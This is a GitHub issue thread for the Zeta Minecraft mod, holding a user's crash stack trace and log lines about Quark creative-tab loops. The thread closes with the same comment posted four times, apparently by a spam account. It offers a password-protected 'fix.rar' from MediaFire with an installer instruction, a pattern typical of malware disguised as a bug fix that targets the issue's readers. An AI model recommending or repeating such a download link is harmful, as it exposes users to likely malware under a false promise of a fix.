### ISSUE TITLE
game crashes when pressing E to open creative mode

### ISSUE THREAD

**Issue by kodytubegaming** [VazkiiMods/Zeta#48]
21:57:19.947
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
game
java.lang.RuntimeException: Creative tab placement misses exceeded failsafe, aborting logic
	at TRANSFORMER/zeta@1.0-24/org.violetmoon.zeta.registry.CreativeTabManager.buildContents(CreativeTabManager.java:173)
	at MC-BOOTSTRAP/net.minecraftforge.eventbus/net.minecraftforge.eventbus.EventBus.doCastFilter(EventBus.java:260)
	at MC-BOOTSTRAP/net.minecraftforge.eventbus/net.minecraftforge.eventbus.EventBus.lambda$addListener$11(EventBus.java:252)
	at MC-BOOTSTRAP/net.minecraftforge.eventbus/net.minecraftforge.eventbus.EventBus.post(EventBus.java:315)
	at MC-BOOTSTRAP/net.minecraftforge.eventbus/net.minecraftforge.eventbus.EventBus.post(EventBus.java:296)
	at LAYER PLUGIN/javafmllanguage@1.20.1-47.3.7/net.minecraftforge.fml.javafmlmod.FMLModContainer.acceptEvent(FMLModContainer.java:114)
	at LAYER PLUGIN/fmlcore@1.20.1-47.3.7/net.minecraftforge.fml.ModLoader.lambda$postEvent$29(ModLoader.java:326)
	at java.base/java.lang.Iterable.forEach(Iterable.java:75)
	at LAYER PLUGIN/fmlcore@1.20.1-47.3.7/net.minecraftforge.fml.ModList.forEachModInOrder(ModList.java:227)
	at LAYER PLUGIN/fmlcore@1.20.1-47.3.7/net.minecraftforge.fml.ModLoader.postEvent(ModLoader.java:326)
	at TRANSFORMER/forge@47.3.7/net.minecraftforge.common.ForgeHooks.onCreativeModeTabBuildContents(ForgeHooks.java:1633)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.world.item.CreativeModeTab.m_269498_(CreativeModeTab.java:129)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.world.item.CreativeModeTabs.m_268957_(CreativeModeTabs.java:1696)
	at java.base/java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:183)
	at java.base/java.util.stream.ReferencePipeline$2$1.accept(ReferencePipeline.java:179)
	at java.base/java.util.Iterator.forEachRemaining(Iterator.java:133)
	at java.base/java.util.Spliterators$IteratorSpliterator.forEachRemaining(Spliterators.java:1845)
	at java.base/java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:509)
	at java.base/java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:499)
	at java.base/java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:150)
	at java.base/java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:173)
	at java.base/java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
	at java.base/java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:596)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.world.item.CreativeModeTabs.m_269421_(CreativeModeTabs.java:1695)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.world.item.CreativeModeTabs.m_269226_(CreativeModeTabs.java:1710)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.gui.screens.inventory.CreativeModeInventoryScreen.<init>(CreativeModeInventoryScreen.java:86)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.gui.screens.inventory.InventoryScreen.m_7856_(InventoryScreen.java:48)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.gui.screens.Screen.m_6575_(Screen.java:321)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.Minecraft.m_91152_(Minecraft.java:1007)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.Minecraft.m_91279_(Minecraft.java:1928)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.Minecraft.m_91398_(Minecraft.java:1795)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.Minecraft.m_91383_(Minecraft.java:1112)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.Minecraft.m_91374_(Minecraft.java:718)
	at TRANSFORMER/minecraft@1.20.1/net.minecraft.client.main.Main.main(Main.java:218)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77)
	at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.base/java.lang.reflect.Method.invoke(Method.java:568)
	at MC-BOOTSTRAP/fmlloader@1.20.1-47.3.7/net.minecraftforge.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:111)
	at MC-BOOTSTRAP/fmlloader@1.20.1-47.3.7/net.minecraftforge.fml.loading.targets.CommonLaunchHandler.clientService(CommonLaunchHandler.java:99)
	at MC-BOOTSTRAP/fmlloader@1.20.1-47.3.7/net.minecraftforge.fml.loading.targets.CommonClientLaunchHandler.lambda$makeService$0(CommonClientLaunchHandler.java:25)
	at MC-BOOTSTRAP/cpw.mods.modlauncher@10.0.9/cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:30)
	at MC-BOOTSTRAP/cpw.mods.modlauncher@10.0.9/cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:53)
	at MC-BOOTSTRAP/cpw.mods.modlauncher@10.0.9/cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:71)
	at MC-BOOTSTRAP/cpw.mods.modlauncher@10.0.9/cpw.mods.modlauncher.Launcher.run(Launcher.java:108)
	at MC-BOOTSTRAP/cpw.mods.modlauncher@10.0.9/cpw.mods.modlauncher.Launcher.main(Launcher.java:78)
	at MC-BOOTSTRAP/cpw.mods.modlauncher@10.0.9/cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:26)
	at MC-BOOTSTRAP/cpw.mods.modlauncher@10.0.9/cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:23)
	at cpw.mods.bootstraplauncher@1.1.2/cpw.mods.bootstraplauncher.BootstrapLauncher.main(BootstrapLauncher.java:141)
  <log4j:Event logger="zeta" timestamp="1724734640026" level="ERROR" thread="Render thread">
    <log4j:Message><![CDATA[Creative tab loop found when adding Block{quark:ancient_bookshelf} next to Block{minecraft:bookshelf}]]></log4j:Message>
  </log4j:Event>
21:57:20.026
monitor
Process Monitor
XML_ERROR_PARSING
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding Block{quark:feeding_trough} next to Block{minecraft:composter}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding Block{quark:ancient_ladder} next to Block{minecraft:ladder}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding ancient_sign next to Block{minecraft:chest}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding Block{quark:azalea_bookshelf} next to Block{minecraft:bookshelf}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding ancient_hanging_sign next to chest
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding Block{quark:azalea_ladder} next to Block{minecraft:ladder}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding azalea_sign next to Block{minecraft:chest}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding Block{quark:blossom_bookshelf} next to Block{minecraft:bookshelf}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding azalea_hanging_sign next to chest
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior
21:57:20.026
zeta
Render thread
Creative tab loop found when adding Block{quark:blossom_ladder} next to Block{minecraft:ladder}
21:57:20.026
zeta
Render thread
For more info enable Creative Verbose Logging in the Zeta config, or set Force Creative Tab Appends to true to disable this behavior

[crash-2024-08-26_21.59.07-client.txt](https://github.com/user-attachments/files/16756763/crash-2024-08-26_21.59.07-client.txt)

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
